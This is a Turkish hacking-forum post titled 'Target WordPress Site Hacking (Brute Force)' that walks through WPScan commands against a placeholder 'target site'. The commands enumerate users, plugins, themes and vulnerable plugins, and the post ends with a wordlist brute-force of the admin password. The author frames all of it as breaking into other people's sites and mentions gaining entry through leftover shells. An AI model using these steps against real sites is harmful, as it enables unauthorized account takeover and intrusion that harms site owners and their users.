Hoşgeldin Misafir

Hedef Wordpress Site Hackleme (Kaba Kuvvet)

By_White

18 Haz 2018
95 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
[font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif]Bu konumda Linux tabanlı işletim sistemlerinde(dağıtımlarda) Wpscan programını kullanmayı anlatmak istiyorum.


Terminali açıyoruz.
Ve ilk önce bi wpscan adlı programımızı güncelliyoruz...

Güncelleme komutu;
Kod:
wpscan --update



Tamam programımız güncellendi.
Program hakkında bilgi almayı isterseniz.

Kod:
wpscan --h
Zaten benim anlattığım komutları kullanırsanız, üstteki help komutunu kullanabilirsiniz..

Siteyi ilk önce bi tarayalım açık olabilir belki diye bundan dolayı kullanacağımız komut;

Kod:
wpscan --url www.hedefsite.com
Wordpress sitelerin en güzel yanlarından biri çok fazla açığa sahip olmaları... Mesela sitedeki tüm kullanıcıların kullanıcı adını öğrenebileceğinizi biliyor muydunuz ? (adminin kullanıcı adı da dahil)

Peki biz bunu nasıl göreceğiz ?

Şu komutla;

Kod:
wpscan --url www.hedefsite.com --enumerate u 

kafanız karışmasın üstteki komutun sonundaki u'nun başında tırnak işareti falan yok. Zaten anlamı da 'user' yani kullanıcı'nın kısaltımıdır.


Her WordPress sitede olur. 
Eklentiler yani pluginler.
Sitedeki pluginleri görmek için şu komutu yazabilirsiniz..

Kod:
wpscan --url www.hedefsite.com --enumerate p


Üstte yazmış olduğum kodun sonundaki p harfi plugins demek oluyor.

WordPress sitelerde bilirsiniz temalar vardır. Bazı insanlar birazdan yazacağım kod ile sitede belki shell bırakılmış olabilme ihtimaline karşı bu yöntemi kullanabiliyor.

Kod:
wpscan --url www.hedefsite.com --enumerate t

Üstteki komutun sonundaki t harfi themes veya templates demektir yani temalar.

Bunları da söylüyorum aklınıza daha iyi yerleşmesi için. Yanlış anlaşılmasın..

Şimdi herşey iyi hoş temadan bi ihtimal açık shell bulup siteye sızarsınız.
Peki ya bi üstte anlattığım plugins ? Neden sitedeki pluginleri bulmaya gerek duyayım ?
Bazı pluginler açıklı oluyor.
Açıklı pluginler ise alttaki komut ile öğreniliyor.
Kod:
wpscan --url www.hedefsite.com --enumerate vp 
Üstteki komutun sonundaki vp harfleri 
Vulnerable Plugins demektir yani açıklı eklentiler anlamına gelir.


Şimdi son dokunuş.
Üstlerde biryerde sitedeki kullanıcı adlarını taramıştık. Diyelim Admin adında bir kullanıcı ismi bulduk.

Şimdi kendimize şifre wordlisti hazırlayıp program aracılığı ile sitede şifre denemeleri yapabilmemiz gerek.

Diyelim Masaüstünde Bir PasswordWordList.txt var.

Şimdi komutumuz aşşağıdaki şekle bürünüyor.


Kod:
wpscan --url www.hedefsite.com --wordlist /home/Masaüstü/PasswordWordList.txt --username Admin



Komutumuzu yazarak siteye wordlistimizdeki şifreleri teker teker denettiriyoruz , olay bu 
smile.gif
--